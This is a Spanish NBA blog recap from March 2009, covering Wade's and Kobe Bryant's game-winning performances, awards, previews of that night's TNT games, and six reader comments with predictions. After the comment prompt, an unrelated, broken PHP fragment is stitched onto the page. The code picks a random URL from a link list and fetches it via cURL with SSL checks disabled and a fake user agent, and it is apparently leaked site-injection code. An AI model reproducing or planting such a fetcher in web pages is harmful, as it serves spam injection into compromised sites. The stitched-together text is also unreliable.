La Crónica (11/03/2009)

12 de March de 2009 por txusma

dwadehouse

Por txusma & MagicJohnson32

Los grandes jugadores nunca se esconden. Aparecen en los momentos decisivos dispuestos a finiquitar partidos y a dar la victoria a su equipo en los últimos minutos. Ayer, Dwyane Wade y Kobe Bryant se erigieron en lo que son, líderes naturales de sus equipos, y consiguieron sendas importantísimas victorias.

En Miami, Wade anotó 32 puntos y el triple que sentenciaba el partido a 34 segundos para el final. Enfrente, unos Celtics que sin Garnett y Rondo bajan enteros. Sus recientes fichajes, Marbury y Moore, seguro que desean olvidar rápido el partido de ayer. 0 de 6 en su segundo partido consecutivo como titular para el primero y 0 de 3 y 4 faltas en el primer cuarto para el segundo.

Y en Houston, Kobe Bryant decidió un partido a cara de perro anotando 18 de sus 37 puntos en los últimos 4:11 y saliendo victorioso de su particular batalla con Ron Artest. Gasol se fue a los 20 puntos y en ausencia de Lamar Odom, Josh Powell demostró que es un jugador más que válido para la rotación de los angelinos artestkobeanotando 17 puntos y capturando 9 rebotes. Con esta derrota se acaba la racha de 12 victorias consecutivas en casa de los Rockets.

En la pelea por los puestos de Playoffs del Oeste, los Jazz no supieron sobreponerse a los buenos partidos de Joe Johnson y Josh Smith y vieron cortada su racha de 12 victorias seguidas. Entre los dos jugadores de  los Hawks lograron 53 puntos, 15 rebotes y 12 asistencias. Además, en el último cuarto apareció Flip Murray para anotar 11 puntos y sellar la victoria. En Portland, en otro partido que se antojaba igualado, Nowitzki y Terry lideraron a los Mavs en su ajustada victoria frente a los Blazers. Y victoria también para los Hornets frente a los Wizards, con el sexto triple doble de la temporada de Chris Paul, y de los Nuggets frente a los Thunder. Ojito que entre la 2ª posición del Oeste y la 8ª sólo hay 4 victorias, así que imaginaos la cantidad de combinaciones posibles que existen todavía para los enfrentamientos de primera ronda de Playoffs.

Ayer comentábamos en el blog que el octavo del Este poco tendrá que hacer contra el que quede finalmente primero, sean los Cavs, los Celtics o los Magic. Ayer esta afirmación ganó un argumento de peso con la paliza que unos Magic a medio gas propinaron a los Bulls, uno de los favoritos para esa plaza. Los mejores del partido fueron… Tonny Battie y Marcin Gortat, con eso está todo dicho. En esa lucha, los Nets dieron un paso atrás con una dolorosa derrota frente a unos Warriors que ya no se juegan nada; los Sixers, en cambio, dieron un paso adelante con su victoria frente a los Raptors. Pero los grandes ganadores de la noche fueron los Knicks. Los de New York ganaron en Auburn Hills a los Pistons en la prórroga con 30 puntos de Nate Robinson y remontando 10 puntos en el último cuarto. Enfrente, Antonio McDyess intentó cubrir las ausencias de Rasheed Wallace y Allen Iverson y en un esfuerzo titánico anotó 21 puntos y capturó 22 rebotes. Entre los Bucks, actualmente octavos y los Knicks, décimoterceros, tan sólo hay 1 victoria y media de diferencia. ¿Alguien pide más emoción?

Y en el partido intrascendente de la jornada victoria de los Wolves frente a unos tristes, tristísimos Grizzlies.

cp3teamPREMIOS

MVP: Los buenos, como ya hemos explicado en la crónica, se lucieron. Chris Paul sumó otro triple doble a su colección con 30 puntos (11 de 16 en tiros de campo), 13 asistencias, 10 rebotes y 4 robos; Wade siguió con su línea de juego y logró 32 puntos, 7 asistencias, 4 rebotes y 4 robos ante los Celtics, a los que rompió con 8 puntos en los últimos cuatro minutos; y Kobe realizó una de esas muestras de poderío anotador al despegar en la segunda mitad del partido ante los Rockets, alentado por el trash talk de Artest, para acabar con 37 puntos (31 en la segunda parte, 18 de ellos en los últimos 4 minutos), 6 asistencias, 5 rebotes, 4 robos y 2 tapones.

El rookie: La baja de Al Jefferson ha dado vía libre a Kevin Love, que anoche logró 19 puntos, 11 rebotes y 4 asistencias ante los Grizzlies.

La sorpresa: 14 puntos, 14 rebotes y un +18 de parcial con él en pista. La aportación de Renaldo Balkman en cada minuto que juega no deja de sorprendernos.

La decepción: Sin Rondo ni Garnett, a Marbury y Moore les correspondía dar un paso al frente. Anoche, entre ambos sumaron 0 puntos con 0 de 9 en tiros de campo. Menos importante, pero igualmente decepcionante, fue el 0 de 9 de Rashard Lewis ante los Bulls. Pero ojo a los de Chicago: Gordon y Rose acumularon un escalofriante 3 de 22 en tiros de campo.

El mayor esfuerzo en vano: Antonio McDyess sigue dando lecciones de profesionalidad. 21 puntos y 22 rebotes logró anoche en la derrota de los Pistons ante los Knicks. Hay que mencionar también a Devin Harris, autor de 31 puntos, 12 asistencias, 7 rebotes y 3 robos contra los Warriors.

RAZONES PARA TRASNOCHAR

Qué bonito menú nos trae este jueves en el habitual double header de la TNT.

lakerspursLakers @ Spurs. A partir de la 1 de la madrugada (horario GMT+1) disfrutaremos de una nueva edición del gran duelo del Oeste. Las dos franquicias que han dominado la Conferencia durante la última década conservan este año su jerarquía, aunque la brecha en la clasificación deja a los texanos un escalón por debajo de los californianos. Los Lakers visitan San Antonio tras recuperar la moral gracias a su victoria en Houston y para la cita recuperan también a Odom, sancionado por abandonar el banquillo durante el indicente Ariza. Los Spurs, que siguen sin poder contar con Ginóbili, vuelven a mostrar su habitual solidez como locales y esperan hacerla valer en el último enfrentamiento ante los Lakers de la regular season.

lbjmo Cavs @ Suns. Más malas noticias para Phoenix: LeBron está en la ciudad. A continuación del Lakers-Spurs, a eso de las 3:35 horas, se disputa un partido fundamental para ambos equipos. Los Cavs siguen luchando por tener ventaja de campo durante todos los Playoffs; en cambio, los Suns apuran sus cada vez más reducidas opciones de jugar la postemporada. Se enfrentan también dos estilos, el de la mejor defensa de la liga, unos Cavs que apenas encajan 90 puntos por partido, y el del ataque frenético de Nash & Co.

La pregunta del día: Una quiniela para los partidos de esta noche. ¿Lakers o Spurs? ¿Cavs o Suns?

Comenta

6 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Pues yo me voy a mojar con la quiniela.

    Teniendo en cuenta que Lakers lleva una semana bastante complicada van a llegar a San Antonio posiblemente bastante cansados. Por lo que no van a afrontar el partido de esta noche en las mejores condiciones. Lakers se está jugando la primera plaza de la liga para el factor campo en una probable final del campeonato. Pero creo que San Antonio con su publico va a dar bastante guerra y necesita algo de confianza.

    San Antonio 60% – Lakers 40%

    En el otro encuentro, Phoenix está al borde de no jugar los plaoyffs. Por lo tanto sus estrellas, que según indica no faltará ninguna, deberan hoy redimirse y intentar ganar a uno de los mejores equipos de la liga según la clasificación. Por eso y por que Cavs no tiene nada que perder apuesto tambien por la victoria local.

    Phoenix Suns 70% – Cleveland 30%
    (seguro que otra vez me va a dejar en ridiculo LeBron (juas juas))

      Citar

  2. Miguel dice:
    #2

    Apuesto por los dos locales

      Citar

  3. Noname dice:
    #3

    Yo como no tengo ni idea y soy de los que se dejan llevar por los mas mediaticos apuesto por los visitantes, jajajajaja. Que le vamos a hacer? soy asi de cafre 😛

    Motivos, precisamente la irregular semana de Lakers me hace pensar que esta noxe se van a querer lucir en un anticipo de la final de conferencia. Y Lebron … pues es mucho Lebron, y tengo el presentimineto que hoy puede hacer un gran partido (con la probabilidad que tiene de hacer un buen partido seguro que no me equivoco mucho jeje).

      Citar

  4. Jabho dice:
    #4

    Spurs y Cavs….

    Boston sin Garnett y Rondo no es que baje enteros, es que deja ser candidato. Vamos como si quitas a Kobe y uno entre Odom, Bynum o Gasol de los Lakers…. A ver si recuperamos la mejor versión del equipo en Po porque la ventaja de campo se está poniendo muy, muy difícil.

      Citar

  5. Landrusski dice:
    #5

    YO DIGO LAKERS Y CAVS
    LAKERS-SPURS:CON UN ESPLENDIDO BRYANT YENDOSE A LOS 50 PUNTOS(A LO MEJOR EXAGERO,PERO ESKE LO INTUYO JAJAJA)

      Citar

  6. Wookie dice:
    #6

    yo voy a apostar por los Spurs , los amarillos antes o después tienen que cansarse… y precisamente hoy puede ser un día de los de agotarse que Parker lleva un mesecito bastante elegante….
    En el otro partido imagino que los Suns lo van a dar todo pero Lebron y sus niños van a ser un hueso demasiado duro, ganaran los Cavs en un buen partido.
    Respecto a Boston se están desinchando mucho… parece que echan de menos más a Rondo que a Garnett, se sabe para cuando vuelven? son imprescindibles porque si no en PO cualquiera les puede dar un buen susto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>